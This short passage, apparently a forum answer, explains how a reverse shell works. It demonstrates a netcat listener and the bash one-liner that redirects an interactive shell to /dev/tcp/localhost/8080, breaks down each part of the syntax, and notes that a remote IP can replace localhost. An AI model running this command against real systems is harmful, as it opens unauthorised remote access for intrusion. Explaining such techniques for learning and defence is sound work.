It’s a(n insecure) remote shell introduced by the target. That’s the opposite of a “normal” remote shell, that is introduced by the source.
Let’s try it with localhost instead of 10.0.0.1:
-
Open two tabs in your terminal.
-
open TCP port 8080 and wait for a connection:
nc localhost -lp 8080
-
Open an interactive shell, and redirect the IO streams to a TCP socket:
bash -i >& /dev/tcp/localhost/8080 0>&1
where
bash -i“If the -i option is present, the shell is interactive.”>&“This special syntax redirects both, stdout and stderr to the specified target.”- (argument for
>&)/dev/tcp/localhost/8080is a TCP client connection tolocalhost:8080. 0>&1redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.
Cf. http://wiki.bash-hackers.org/syntax/redirection
-
- Rejoice as you have a prompt in tab 1.
- Now imagine not using
localhost, but some remote IP.